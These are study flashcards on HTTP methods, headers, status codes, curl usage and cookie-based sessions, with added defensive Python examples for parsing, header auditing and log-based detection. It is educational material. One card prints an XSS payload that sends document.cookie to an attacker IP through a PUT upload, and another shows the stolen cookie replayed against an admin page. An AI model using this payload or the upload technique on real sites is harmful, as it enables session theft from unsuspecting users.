14.1 HTTP with Session and Cookies Flashcards

1
Q

Securing the web requires in-depth knowledge of what topics? (4)

A
  1. Client-server architecture
  2. HyperText Transfer Protocol (HTTP)
  3. HTTP requests
  4. HTTP responses
2
Q

The client-server model is an exchange of information, a cycle of _______ and _______ between ______ and ________.

A

The client-server model is an exchange of information, a cycle of requests and responses between clients and servers.

3
Q

Clients and servers use the _______ to communicate on the web.

A

Clients and servers use the HTTP protocol to communicate on the web.

4
Q

HTTP is at what layer of the OSI model?

A

Layer 7 Application

HTTP is used to transfer web pages, static assets such as images and HTML/markup files, and raw data, such as MP4 video or MP3 audio.

5
Q

There are various types of requests, known as ________, which indicate the specific actions between the client and server.

A

There are various types of requests, known as HTTP methods, which indicate the specific actions between the client and server.

6
Q

What are the three main kinds of HTTP method?

A
  1. A user requests data from a server:

Ex. I’d like to see my friend’s photos on Facebook.

  2. A user gives data to a server:

Ex. Here are my credentials for my LinkedIn account.

  3. A user updates data already existing on a server:

Ex. Two new accounts have been added to the employee directory database.

7
Q

What are all the various HTTP methods? (6)

A
  1. GET - Requests data from a server.
  2. POST - Sends data to a server resource, often creating or changing server-side state.
  3. PUT - Creates or fully replaces the resource at the target URL with the request body.
  4. DELETE - Deletes a specified resource.
  5. CONNECT - Establishes a tunnel to the server (normally through a proxy).
  6. OPTIONS - Lists the communication options for the target resource.
8
Q

What is an example of a GET request?

A

When you open a browser and go to amazon.com, the HTTP client (your browser) asks to GET the data that the URL (amazon.com) points to. That data is the webpage.

9
Q

What is an example of a POST request?

A

Once your browser goes to amazon.com, you need to log into your Amazon account. The client sends a POST request that contains your credentials for logging in.

10
Q

What does the whitespace mean in a request?

A

The whitespace is a blank line (CRLF CRLF on the wire) that marks the end of the headers. A request with no body ends there; when the request carries a body, the body follows the blank line.

11
Q

______ is a command-line client that allows us to send data to and from servers. This allows security professionals to:(4)

A

curl

  1. Test web server security configurations.
  2. Ensure web servers don’t leak sensitive data through their HTTP responses.
  3. Verify that servers only respond to certain types of requests.
  4. Look for vulnerabilities on a web server.
12
Q

HTTP resources are inherently ________, meaning that when your browser requests a web page, the webpage can’t distinguish you from others.

A

stateless

13
Q

True or False: Websites need a way to deliver content that is specific to each user. To do so, they establish sessions with cookies.

A

True. Cookies are small pieces of text data that, when sent in an HTTP server’s response header (Set-Cookie), are saved by the user’s HTTP client and returned to that server on later requests.

14
Q

HTTP requests are sent from an ______ to an ______

A

HTTP requests are sent from an HTTP client to an HTTP server

15
Q

_______ are sent back from the ________ as a response to the client

A

HTTP responses are sent back from the HTTP server as a response to the client

16
Q

HTTP requests include: (3)

A
  1. Request line
  2. Request header
  3. Optional request body
17
Q

HTTP responses include: (3)

A
  1. Status line
  2. Response header
  3. Usually a response body
18
Q

Explain query parameters:

A

Query parameters allow you to be specific about the parts of a resource you want to send or receive data from.

19
Q

Explain the PUT method:

A

PUT requests also send data to an HTTP server, but they are used to create or fully replace the resource at the target URL with the request body (PATCH, not PUT, is the method for a partial update). A server that accepts PUT from clients it has not authenticated is letting them write files onto it, which a later card shows being abused.

20
Q

Explain the DELETE method

A

The DELETE method deletes the specified resource from the server

21
Q

Explain the CONNECT method:

A

The CONNECT method asks the server (usually a forward proxy) to open a TCP tunnel to a named host and port, so the client can pass another protocol, such as TLS, through it.

22
Q

Explain the OPTIONS method:

A

OPTIONS requests ask an HTTP server to respond with all HTTP methods that the HTTP server is programmed to respond to.

23
Q

Explain what an HTTP request looks like:

A

A **request line** contains the request method, the name of the requested resource, and the version of HTTP in use.

  • The request line can also contain **query parameters**, which the client can use to send data to the server.

**Headers** contain additional details about the requested resource. They are used to implement many actions with security implications, such as authentication and remembering user resources.

  • There are many different types of headers, and you aren’t expected to remember them all.
  • We’ll see the most common headers as we continue to explore requests and responses. Links to reference documentation will be provided, which you can use for your own research later.

**Whitespace** is a blank line that marks the end of the headers. A request without a body ends there; when there is a body (as in a POST), it follows the blank line.

24
Q

Once the server receives the request, explain what it returns:

A

A **status line** contains the protocol version, the response status code and its reason phrase, such as OK or Conflict.

**Headers** contain additional information about the response, similar to request headers.

**Whitespace** (a blank line) separates the headers from the response body that follows.

A **response body** contains the resource requested by the client, for example the HTML and styling that your browser uses to render the page.
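The layout the last two cards describe (start line, headers, blank line, body) is simple enough to parse by hand, and doing so makes the rules concrete: the blank line is CRLF CRLF on the wire, header names are case-insensitive, and some headers (Set-Cookie) may repeat. The parser below is an added example, not part of the original flashcards; the request and response it parses are constructed samples that reuse values from later cards.

```python
"""Parse raw HTTP/1.1 messages into start line, headers and body.

Added example, not from the flashcards. The two messages at the bottom are
constructed samples.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple


@dataclass
class HttpMessage:
    start_line: str
    # Kept as (name, value) pairs: a header such as Set-Cookie may appear
    # more than once, and a dict would silently drop the earlier copies.
    headers: List[Tuple[str, str]] = field(default_factory=list)
    body: bytes = b""


def parse_message(raw: bytes) -> HttpMessage:
    """Split head from body at the blank line that ends the header block."""
    # On the wire the separator is CRLF CRLF; tolerate bare LF for pasted samples.
    sep = b"\r\n\r\n" if b"\r\n\r\n" in raw else b"\n\n"
    head, _, body = raw.partition(sep)
    lines = head.decode("iso-8859-1").splitlines()
    msg = HttpMessage(start_line=lines[0], body=body)
    for line in lines[1:]:
        if not line:
            continue
        name, colon, value = line.partition(":")
        if not colon:
            raise ValueError(f"malformed header line: {line!r}")
        # Header names are case-insensitive; normalise so lookups are simple.
        msg.headers.append((name.strip().lower(), value.strip()))
    return msg


def header(msg: HttpMessage, name: str) -> Optional[str]:
    """First value of a header, or None if absent."""
    return next((v for n, v in msg.headers if n == name.lower()), None)


def headers_all(msg: HttpMessage, name: str) -> List[str]:
    """Every value of a repeatable header, in order."""
    return [v for n, v in msg.headers if n == name.lower()]


def parse_request_line(line: str) -> Tuple[str, str, str]:
    """'POST /login HTTP/1.1' -> (method, target, version)."""
    method, target, version = line.split(" ", 2)
    return method, target, version


def parse_status_line(line: str) -> Tuple[str, int, str]:
    """'HTTP/1.1 200 OK' -> (version, status code, reason phrase)."""
    parts = line.split(" ", 2)
    reason = parts[2] if len(parts) > 2 else ""  # the reason phrase is optional
    return parts[0], int(parts[1]), reason


def body_matches_length(msg: HttpMessage) -> bool:
    """Check that Content-Length agrees with the bytes actually received."""
    declared = header(msg, "content-length")
    return declared is None or int(declared) == len(msg.body)


# Constructed sample: a login POST like the one card 9 describes.
SAMPLE_REQUEST = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: www.fakesite.com\r\n"
    b"Connection: keep-alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 30\r\n"
    b"\r\n"
    b"username=alice&password=s3cret"
)

# Constructed sample response that sets two cookies.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache/2.4.7 (Ubuntu)\r\n"
    b"Set-Cookie: SESSID=8toks; HttpOnly\r\n"
    b"Set-Cookie: theme=dark\r\n"
    b"Content-Type: text/html\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b"<p>hello</p>"
)

if __name__ == "__main__":
    req = parse_message(SAMPLE_REQUEST)
    print(parse_request_line(req.start_line), header(req, "Host"), req.body)
    resp = parse_message(SAMPLE_RESPONSE)
    print(parse_status_line(resp.start_line), headers_all(resp, "Set-Cookie"))
```

The Content-Length check matters in practice: a body shorter or longer than declared is how request-smuggling and truncation bugs start, so a parser should notice the mismatch rather than trust the header.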

25
Q

Breakdown this request line:

GET /js/analytics.js HTTP/1.1

A

GET: The request method.

/js/analytics.js: The requested resource, given as a path on the server named by the Host header.

HTTP/1.1: The protocol version used by the browser.

26
Q

Breakdown this header section (part 1):

Host: www.target-server.com
Connection: keep-alive

A

Host: www.target-server.com: Contains the domain name of the target server.

Connection: keep-alive: Tells the server to keep the TCP connection used for this HTTP transfer open after sending the response.

  • This allows the client and server to reuse the TCP connection for later HTTP requests.
  • The alternative is a new TCP handshake for every exchange: open a connection, transfer the request and response, close the connection, and repeat for each request/response cycle.
  • Since HTTP usually involves a series of requests and responses, this would result in slower transfers than simply reusing the connection.
27
Q

Breakdown this header section (part 2):

Upgrade-Insecure-Requests: 1
Accept: text/js, text/html, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0

A

Upgrade-Insecure-Requests: 1: Tells the server that the client would prefer an encrypted (HTTPS) response. A server that honors it answers with a redirect to the HTTPS URL; it cannot encrypt the existing plaintext connection in place.

Accept: text/js, text/html, */*: Tells the server that the client expects a JavaScript or HTML document in response (text/js, text/html), but will accept data of any type (*/*).

Accept-Language: en-us: The language the client prefers for the response.

Accept-Encoding: gzip, deflate: The compression schemes the client can decode, so the server may compress the response body.

User-Agent: Mozilla/4.0: Tells the server that this request claims to come from a Mozilla 4.0 browser. The value is set by the client and trivially forged, so it must never be used for access decisions.

28
Q

What are some of the common request headers? (3)

A

**Authorization**: Contains the credentials used to authenticate a user with a server.

**Referer**: Contains the address of the previous webpage from which the currently requested page was linked (the misspelling is the header’s official name). Servers use it to see where visitors come from, for analytics, logging, or optimized caching. Like every request header it is set by the client, so it can be omitted or forged and must not be relied on for authorization.

  • If a link from a Google search led to the current page, the referrer is Google.

**Cookie**: Contains stored HTTP cookies previously sent by the server with the **Set-Cookie** response header.

29
Q

GET requests can also request data with ________.

A

GET requests can also request data with query parameters.

Query parameters are useful for specifying which parts of a resource to receive or send data to

30
Q

The general syntax for query parameters is:

A

[path]?[firstParam]=[value]&[secondParam]=[value]

HTTP itself puts no limit on the number of query parameters in a GET request, but browsers, proxies and servers cap the total URL length (commonly a few thousand bytes), and a server rejects an over-long one with 414 URI Too Long.
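Two things about the syntax above bite in practice: a value that itself contains & or = must be percent-encoded or it is read as a parameter boundary, and a key may repeat (id=1&id=2), which different server frameworks resolve differently. The following is an added example, not from the flashcards, using only Python’s standard library; the paths and parameter names are constructed.

```python
"""Build and parse the [path]?[k]=[v]&[k2]=[v2] part of a request target.

Added example, not from the flashcards; standard library only. The sample
targets are constructed.
"""
from urllib.parse import parse_qs, urlencode, urlsplit


def build_target(path: str, params: dict) -> str:
    """Assemble a request target, percent-encoding reserved characters.

    A value containing '&' or '=' would otherwise be read as a parameter
    boundary; a list value becomes a repeated key (id=1&id=2).
    """
    return f"{path}?{urlencode(params, doseq=True)}"


def parse_target(target: str):
    """Split a request target into (path, {key: [values]}).

    parse_qs returns a list per key because a key may repeat; keep_blank_values
    keeps 'debug=' visible instead of silently dropping it.
    """
    parts = urlsplit(target)
    return parts.path, parse_qs(parts.query, keep_blank_values=True)


def single_value(params: dict, key: str) -> str:
    """Fetch a parameter that must appear exactly once.

    Frameworks differ on whether 'id=1&id=2' yields the first or the last
    value; refusing duplicates removes that ambiguity at the boundary.
    """
    values = params.get(key, [])
    if len(values) != 1:
        raise ValueError(f"expected exactly one {key!r}, got {len(values)}")
    return values[0]


if __name__ == "__main__":
    target = build_target("/search", {"q": "fish & chips", "page": 2})
    print(target)
    path, params = parse_target(target)
    print(path, params, single_value(params, "q"))
```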

31
Q

POST requests are used to __________.

A

POST requests are used to send data to a server.

POST requests send data to an HTTP server’s resources, such as login credentials or images for a webpage.

32
Q

The structure of an HTTP POST request is similar to a GET request, but includes a _______ below the whitespace.

A

**request body**

The request body may contain information such as login credentials or a file to be uploaded. In the current example, our request body contains login credentials

33
Q

Breakdown this status line from an HTTP response:

HTTP/1.1 200 OK

A

HTTP/1.1: The protocol version in use. The version string says nothing about encryption; whether the exchange was encrypted depends on whether it ran over TLS (https://), which is a property of the transport, not of the HTTP version.

200 OK: Status code and reason phrase showing that the request was processed properly.

34
Q

Breakdown the response headers from the same HTTP response:

A

Date: Contains a timestamp of when the response was generated.

Server: Apache/2.4.7 (Ubuntu): Indicates the server is running Apache 2.4.7 on Ubuntu.

X-Powered-By: PHP/5.5.9-1ubuntu4.21: Indicates the server is running PHP 5.5.9; the 1ubuntu4.21 suffix is the Ubuntu package revision of that PHP build, not a kernel version. Server and X-Powered-By together hand an attacker exact software versions to look up known vulnerabilities for, which is why hardening guides suppress or trim both.

Set-Cookie: SESSID=8toks; httponly: Tells the client to create a cookie called SESSID with the value 8toks. The httponly attribute means client-side script (document.cookie) cannot read the cookie; it is still sent automatically on HTTP requests to the server. We’ll discuss cookies and httponly in greater detail later.

Below the whitespace is the response body, which contains the source code of the resource requested in the GET request.

35
Q

What do the following status codes mean?

  • 200
  • 300
  • 400 & 404
  • 500
A

200 - 2xx codes indicate success.

300 - 3xx codes indicate redirection: the client must take a further step (usually following a Location header) to complete the request. 300 itself is Multiple Choices, meaning the server can respond to the request in more than one way.

  • 400 - 4xx codes indicate client errors: the request was malformed, unauthenticated, forbidden, or aimed at something that does not exist.
  • 404 - Not Found is a common example of a 4xx code, indicating that a webpage doesn’t exist or can’t be accessed.

500 - 5xx codes indicate server errors, meaning the server application failed somehow.
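Card 11 says curl is used to make sure servers do not leak sensitive data through their responses; cards 34 and 35 show what to look for. The audit below is an added example, not from the flashcards: it takes already-parsed response headers, classifies the status code by its first digit, flags version strings in Server and X-Powered-By, and checks each Set-Cookie for the HttpOnly, Secure and SameSite attributes. Those checks are ordinary hardening practice rather than anything the cards prescribe, and the two header lists are constructed from card 34.

```python
"""Audit a parsed set of response headers for disclosure and weak cookies.

Added example, not from the flashcards. The checks are ordinary hardening
practice (version strings in Server/X-Powered-By, cookie attributes); the
header lists at the bottom are constructed samples built from card 34.
"""
import re

VERSION_RE = re.compile(r"\d+\.\d+")


def status_class(code: int) -> str:
    """Map a status code to its class by the first digit (card 35)."""
    return {1: "informational", 2: "success", 3: "redirection",
            4: "client error", 5: "server error"}.get(code // 100, "unknown")


def parse_set_cookie(value: str):
    """'SESSID=8toks; httponly; Path=/' -> ('SESSID', '8toks', {'httponly': '', 'path': '/'}).

    Attribute names are case-insensitive, so they are lower-cased here.
    """
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value, attrs


def audit_headers(headers) -> list:
    """Return one finding string per problem; an empty list means clean."""
    findings = []
    for name, value in headers:
        lname = name.lower()
        if lname in ("server", "x-powered-by") and VERSION_RE.search(value):
            # Exact versions let an attacker look up known CVEs for the stack.
            findings.append(f"{name} discloses software version: {value}")
        elif lname == "set-cookie":
            cname, _, attrs = parse_set_cookie(value)
            if "httponly" not in attrs:
                findings.append(f"cookie {cname} lacks HttpOnly (readable by script)")
            if "secure" not in attrs:
                findings.append(f"cookie {cname} lacks Secure (sent over plain HTTP)")
            if attrs.get("samesite", "").lower() not in ("lax", "strict"):
                findings.append(f"cookie {cname} lacks SameSite=Lax/Strict (sent cross-site)")
    return findings


# Constructed from the headers on card 34.
LEAKY_HEADERS = [
    ("Date", "Thu, 12 Mar 2020 06:02:20 GMT"),
    ("Server", "Apache/2.4.7 (Ubuntu)"),
    ("X-Powered-By", "PHP/5.5.9-1ubuntu4.21"),
    ("Set-Cookie", "SESSID=8toks; httponly"),
]

# The same response after hardening: no versions, all cookie attributes set.
HARDENED_HEADERS = [
    ("Date", "Thu, 12 Mar 2020 06:02:20 GMT"),
    ("Server", "Apache"),
    ("Set-Cookie", "SESSID=8toks; HttpOnly; Secure; SameSite=Lax; Path=/"),
]

if __name__ == "__main__":
    for finding in audit_headers(LEAKY_HEADERS):
        print(finding)
    print(audit_headers(HARDENED_HEADERS))  # expect an empty list
```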

36
Q

What kind of request was used here that would cause an HTTP server to tell the client all of the HTTP request methods it will respond to?

**HTTP Response 1**

```HTTP
HTTP/1.1 200 OK
Date: Tue, 25 Sep 2018 21:21:20 GMT
Server: Apache/2.2.21 (Unix mod_ssl/2.2.21 OpenSSL/1.0.0k DAV/2 PHP/5.4.3)
WWW-Authenticate: Cookie realm="fakesite"
Allow: OPTIONS, GET, POST, HEAD, PUT
```
A

They used the OPTIONS method; the Allow response header is the server’s list of methods it accepts for that resource. This was the attacker’s reconnaissance phase, where they found out all available HTTP methods that can be requested to the HTTP server.

The OPTIONS method is useful for an attacker to find out what kind of request methods they can leverage while attempting to compromise an HTTP server. Here the list includes PUT, which the later cards show being abused to write a file onto the server.

37
Q

What status code was returned in this response? What kind of method was used to generate this HTTP response? What sort of information was input to this HTTP request? What did the attacker try to do? Were they successful?

```HTTP
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Cookie realm="fakesite"
form-action="/login"
cookie-name=AUTH-COOKIE
Content-Type: text/html

<title>Unauthorized</title>

<form>
<br></br> <input></input><br></br> <p><label>Username: <input></input></label><br></br> </p>
<p><label>Password: <input></input></label><br></br> </p>
<p><button>Sign in</button><br></br> </p>
<p><a>Register for an account</a><br></br> </p>
</form>

```

A

401 Unauthorized.

While we don’t see the request, we can tell that the attacker tried to log in to the login portal: the form posts to /login, so the request was a POST carrying a username and password.

The 401 status and the WWW-Authenticate header show that the server rejected those credentials and sent the login form back, so the attempt was not successful.

38
Q

What type of method was used in the request? What file name was uploaded to the site, according to the request body? Based on the request method and request body, what do you think happened here?

**HTTP Request 1**

```HTTP
PUT /XSS.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: www.fakesite.com/blog

<script>
document.location='http://133.7.13.37/cookiestealer.php?c='+document.cookie;
</script>
```

**HTTP Response 3**

```HTTP
HTTP/1.1 201 Created
Date: Mon, 05 May 2014 12:28:53 GMT
Server: Apache/2.2.14 (Win32)
Content-type: text/html
Content-length: 30
Connection: Closed
```
A

The attacker used the PUT method.

XSS.html. That is the file written to the site (the request target). cookiestealer.php lives on the attacker’s own server at 133.7.13.37; it is the script that receives the stolen cookies, not the uploaded file.

The server accepted PUT from this client (201 Created), so the attacker used it to upload a page containing a script. Any user who loads /XSS.html is redirected to the attacker’s server with their document.cookie appended to the URL, which hands the attacker their session cookie. Two defenses would have stopped this: not allowing PUT (or any write method) for unauthenticated clients, and setting the session cookie with HttpOnly so document.cookie cannot read it.

39
Q

Is there anything interesting about the URL requested?

**HTTP Request 4**

```HTTP
GET https://www.fakesite.com/admin HTTP/1.1
Cookie: $Version="1"; AUTH-COOKIE="sdf354s5c1s8e1s"; $Path="/admin"
```
A

The request targets the /admin area of the site, and it carries an AUTH-COOKIE value rather than any credentials. Looking at HTTP Request 4 together with the previous cards, the attacker stole a victim’s cookie and used it to reach the admin portal with a plain GET request: no login was needed, because the server treats whoever presents a valid session cookie as that session’s user.
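The chain in cards 36 to 39 leaves traces in the server’s access log: a successful OPTIONS probe, a successful PUT, and one session cookie presented from two different client addresses. The detector below is an added example, not from the flashcards. It assumes a custom access-log format with five space-separated fields (client IP, method, path, status, and the request’s Cookie header, or - when absent), which is not a standard Apache format; the log lines are constructed and reuse the paths and cookie value from the cards, with attacker and victim addresses taken from the documentation IP ranges.

```python
"""Spot the attack chain from cards 36-39 in server access logs.

Added example, not from the flashcards. It assumes a custom access-log
format with five space-separated fields: client IP, method, path, status
and the request's Cookie header ('-' when absent); the lines below are
constructed and reuse the paths and cookie value shown on the cards.
"""
import re
from collections import defaultdict

# Methods a public blog should accept from anonymous clients; anything else
# succeeding (OPTIONS recon, PUT/DELETE writes) is worth a look.
ALLOWED_METHODS = {"GET", "HEAD", "POST"}
SESSION_COOKIE = "AUTH-COOKIE"  # cookie name taken from card 39
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (.+)$")


def parse_line(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, method, path, status, cookie = m.groups()
    return {"ip": ip, "method": method, "path": path,
            "status": int(status), "cookie": None if cookie == "-" else cookie}


def session_id(cookie_header: str):
    """Pull the session cookie's value out of a Cookie header (quotes stripped)."""
    for pair in cookie_header.split(";"):
        name, _, value = pair.strip().partition("=")
        if name.strip() == SESSION_COOKIE:
            return value.strip().strip('"')
    return None


def detect(log_text: str) -> list:
    findings = []
    ips_per_session = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] not in ALLOWED_METHODS and 200 <= rec["status"] < 300:
            findings.append(f"{rec['ip']} used {rec['method']} on {rec['path']} and got {rec['status']}")
        if rec["cookie"]:
            sid = session_id(rec["cookie"])
            if sid:
                ips_per_session[sid].add(rec["ip"])
    # One session presented from several addresses is the signature of a
    # stolen cookie being replayed (card 39).
    for sid, ips in sorted(ips_per_session.items()):
        if len(ips) > 1:
            findings.append(f"session {sid} used from {len(ips)} addresses: {', '.join(sorted(ips))}")
    return findings


# Constructed: a normal visitor, then the attacker's recon, upload, the
# victim loading the planted page, and the attacker replaying the cookie.
SAMPLE_LOG = """\
198.51.100.4 GET /blog 200 AUTH-COOKIE=abc123
203.0.113.7 OPTIONS /blog 200 -
203.0.113.7 PUT /XSS.html 201 -
192.0.2.10 GET /XSS.html 200 AUTH-COOKIE=sdf354s5c1s8e1s
203.0.113.7 GET /admin 200 AUTH-COOKIE=sdf354s5c1s8e1s
"""

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The session-from-several-addresses rule produces false positives for users on mobile networks or VPNs, so in practice it is a signal to correlate (with user agent, geography and timing) rather than an alert on its own.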

40
Q

What is the most basic type of curl request and why would you need to use it?

A

curl https://somedomain.com

For example, when working through a container that has no user interface, you’ll need a command-line tool to send and receive HTTP requests.

41
Q

Running curl with the --head flag will only show ________.

Breakdown the following response:

Ex. curl --head https://posthere.io

```console
HTTP/1.1 200 OK
Server: nginx/1.9.2
Date: Thu, 12 Mar 2020 06:02:20 GMT
Content-Type: text/html
Content-Length: 12905
Last-Modified: Wed, 01 Jan 2020 17:09:18 GMT
Connection: close
ETag: "5e0cd23e-3269"
Accept-Ranges: bytes
```
A

Running curl with the --head flag (short form -I) sends a HEAD request and shows only the response headers.

  • The Content-Type response header (text/html) tells our client (curl) that it is receiving a response body with the resource type HTML. This header serves the same purpose as a file name extension in your operating system.
  • The Server response header tells our client it is talking to an nginx web server, one of the most popular HTTP servers, and here leaks its exact version (1.9.2).
42
Q

Unlike a regular GET request, which simply names the resource to fetch, POST requests need to __________________.

A

Unlike a regular GET request, which simply names the resource to fetch, POST requests need to specify *where* you want to send information to (the target URL) and *what* to send (the request body).

43
Q

Breakdown this basic POST request (a target URL with no data yet):

curl -X POST https://posthere.io/f260-48d9-8e1b

A

-X: Indicates that we are using a method other than the default GET.

POST: The method we are using.

https://posthere.io/f260-48d9-8e1b: Our unique URL that the page gave us. Everyone who uses the site is given a different URL.

44
Q

Breakdown this POST Request with Plain Data:

curl -X POST -d "test data" [URL]

A

curl: The tool we are using.

-X: Indicates that we are using a different method than the default GET. (-d already makes curl send a POST, so -X POST is redundant here; it is needed only for other methods, such as PUT.)

POST: The method we are using.

-d: Sends the data in the request body, labelled Content-Type: application/x-www-form-urlencoded unless you override it with -H.

"test data": The message we are sending.

[URL], e.g. https://posthere.io/f260-48d9-8e1b: The unique URL that the page gave us.

45
Q

How would you create a POST request to upload structured JSON data?

A

curl -X POST -d '{"jsonKey1": "jsonValue1", "jsonKey2": "jsonValue2"}' -H "Content-Type: application/json" [Your URL]

  • This command tells the server that we are sending it JSON data with the -H option, followed by "Content-Type: application/json". The JSON is wrapped in single quotes so the shell leaves its double quotes intact; without the header, curl would label the body application/x-www-form-urlencoded and the server would not parse it as JSON.
46
Q

HTTP resources are inherently ______, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.

A

HTTP resources are inherently **stateless**, meaning that whenever your browser requests a webpage, there is no way for that webpage to distinguish you from anyone else.

47
Q

Websites need a way to deliver content that is specific to each user. To do so, they establish ______, with ______.

A

Websites need a way to deliver content that is specific to each user. To do so, they establish **sessions**, with **cookies**.

48
Q

Fill in the blanks:

  • A ______ contains user-specific information that is saved in order to personalize an HTTP response.
  • A ______ has information that uniquely identifies each session.
  • The cookie is created by the HTTP server and sent to an HTTP client through a _______.
  • When the HTTP server sends the client the cookie, it also sends back the __________.
  • The ______ receives the cookie, saves it, and processes the personalized response body.
  • On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a _______ and _______ can be received in return.
A
  • A session contains user-specific information that is saved in order to personalize an HTTP response.
  • A cookie has information that uniquely identifies each session.
  • The cookie is created by the HTTP server and sent to an HTTP client through a response header.
  • When the HTTP server sends the client the cookie, it also sends back the personalized response body.
  • The HTTP client receives the cookie, saves it, and processes the personalized response body.
  • On future requests to the HTTP server, the HTTP client will send the cookie back to the HTTP server so that a personalized response body and cookie can be received in return.

49
Q

What types of attacks are cookies vulnerable to?

A

It’s relatively difficult to guess or forge the session ID in a cookie created by a modern implementation, because the ID is long and random.

  • However, these cookies are still vulnerable to theft through attacks such as cross-site scripting (XSS) or man-in-the-middle interception, which we will cover in a later unit.
  • Instead of an attacker needing to figure out how to create a cookie that looks like another user’s, they can simply steal it from them.
50
Q

A cookie is used to implement a ______.

A

A cookie is used to implement a user’s session.

51
Q

A client and server exchange cookies through _______.

A

A client and server exchange cookies through headers.

52
Q

Clients save cookies ______.

A

Clients save cookies locally.

53
Q

A client sends a cookie via the ______ , whereas a server sends a cookie via the _______.

A

A client sends a cookie via the Cookie header. A server sends a cookie via the Set-Cookie header

54
Q

Bad implementations of cookies can be ______ or ______, and cookies with modern implementations can be ______.

A

Bad implementations of cookies can be spoofed or stolen, and cookies with modern implementations can be stolen.
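Cards 48 through 54 describe the whole loop: the server creates a session, names it in a Set-Cookie header, the client stores the cookie and replays it in a Cookie header, and the server resolves that value back to the session. The code below is an added example, not from the flashcards: toy Server and Client classes that only produce and consume those two header values. The cookie name SESSID is taken from card 34; the attribute set the server sends and the use of a 256-bit random ID are assumptions about what a hardened implementation would do.

```python
"""A minimal session mechanism built on the Cookie / Set-Cookie headers.

Added example, not from the flashcards. Server and Client are toy classes
that only produce and consume the two header values; the cookie name
SESSID comes from card 34, the attribute set is an assumption about a
hardened server.
"""
import secrets

SESSION_COOKIE = "SESSID"


class Server:
    def __init__(self):
        self.sessions = {}  # session id -> user-specific state (the "session")

    def login(self, username: str) -> str:
        """Start a session; return the Set-Cookie header value for the response."""
        # 32 random bytes: an id an attacker cannot guess or forge, which
        # leaves theft as the only remaining route (card 54).
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = {"user": username}
        return f"{SESSION_COOKIE}={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"

    @staticmethod
    def _session_id(cookie_header: str):
        """Find the session cookie's value in a request's Cookie header."""
        for pair in cookie_header.split(";"):
            name, _, value = pair.strip().partition("=")
            if name == SESSION_COOKIE:
                return value
        return None

    def session_for(self, cookie_header: str):
        """Resolve a Cookie header to its session, or None for unknown/forged ids."""
        return self.sessions.get(self._session_id(cookie_header))

    def logout(self, cookie_header: str) -> None:
        """Invalidate server-side, so a stolen copy of the cookie stops working."""
        self.sessions.pop(self._session_id(cookie_header), None)


class Client:
    """Stores cookies from Set-Cookie and replays them in a Cookie header."""

    def __init__(self):
        self.jar = {}

    def receive(self, set_cookie_value: str) -> None:
        # Only the name=value pair is ever sent back. The attributes (HttpOnly,
        # Secure, ...) are kept by the client and decide when it sends the cookie.
        name, _, value = set_cookie_value.split(";")[0].partition("=")
        self.jar[name.strip()] = value.strip()

    def cookie_header(self) -> str:
        return "; ".join(f"{n}={v}" for n, v in self.jar.items())


if __name__ == "__main__":
    server, alice = Server(), Client()
    alice.receive(server.login("alice"))
    print(server.session_for(alice.cookie_header()))   # alice's session
    print(server.session_for("SESSID=0001"))           # a guessed id: None
    thief = Client()
    thief.jar = dict(alice.jar)                        # a stolen copy works...
    print(server.session_for(thief.cookie_header()))
    server.logout(alice.cookie_header())               # ...until the server ends the session
    print(server.session_for(thief.cookie_header()))
```

The last two steps are the point of card 54: a stolen cookie is indistinguishable from the legitimate one, so the only remedies are keeping it from being stolen (HttpOnly, Secure, short lifetimes) and being able to revoke it server-side.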

55
Q

Why is it important for cybersecurity professionals to know how to manage cookies with curl?

A

Web application security engineers need to repeatedly ensure cookies are both functional and safe from tampering.

For example, you might need to request a cookie from a webpage and then test various HTTP responses using that cookie. Doing this over and over through the browser is tedious, but can be automated with scripts.

The same concepts apply for penetration testers and hackers: curl will be used to quickly save a cookie in order to test various exploits.

For example, an HTTP server may be configured so that in order to POST data to specific pages, clients need cookies or authentication information set in their request headers that the server can verify.

56
Q

What are the two curl options that allow users to look through headers, send data, authenticate to servers, and also save and send cookies?

A

We can use the option --cookie-jar (short form -c) to save the cookies set in a response header to a text file.

We can use the option --cookie (short form -b) to specify a text file where a cookie is saved in order to send a request with the cookies embedded in the request header. The same option also accepts a literal "name=value" string instead of a file name.
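The file --cookie-jar writes is in the Netscape cookie format that curl documents: one cookie per line with seven tab-separated fields (domain, whether subdomains match, path, Secure flag, expiry as Unix time with 0 for a session cookie, name, value), and HttpOnly cookies marked by a #HttpOnly_ prefix on the domain. Being able to read it back is how you check what a test run actually stored. The reader below is an added example, written for this page rather than taken from curl; the file contents are constructed, and the selection rules (domain match, path prefix, Secure only over HTTPS, not past expiry, longer paths first) are the ones clients apply when building a Cookie header.

```python
"""Read the cookie file curl writes with --cookie-jar and build a Cookie header.

Added example, not from the flashcards or from curl. The file layout is the
Netscape cookie format curl documents (seven tab-separated fields; HttpOnly
cookies carry a '#HttpOnly_' prefix on the domain); the file contents below
are constructed.
"""
from dataclasses import dataclass
from typing import List


@dataclass
class Cookie:
    domain: str
    include_subdomains: bool
    path: str
    secure: bool
    expires: int      # Unix time; 0 means a session cookie
    name: str
    value: str
    http_only: bool


def parse_cookie_jar(text: str) -> List[Cookie]:
    cookies = []
    for line in text.splitlines():
        http_only = line.startswith("#HttpOnly_")
        if http_only:
            line = line[len("#HttpOnly_"):]   # the rest of the line is a normal record
        elif not line.strip() or line.startswith("#"):
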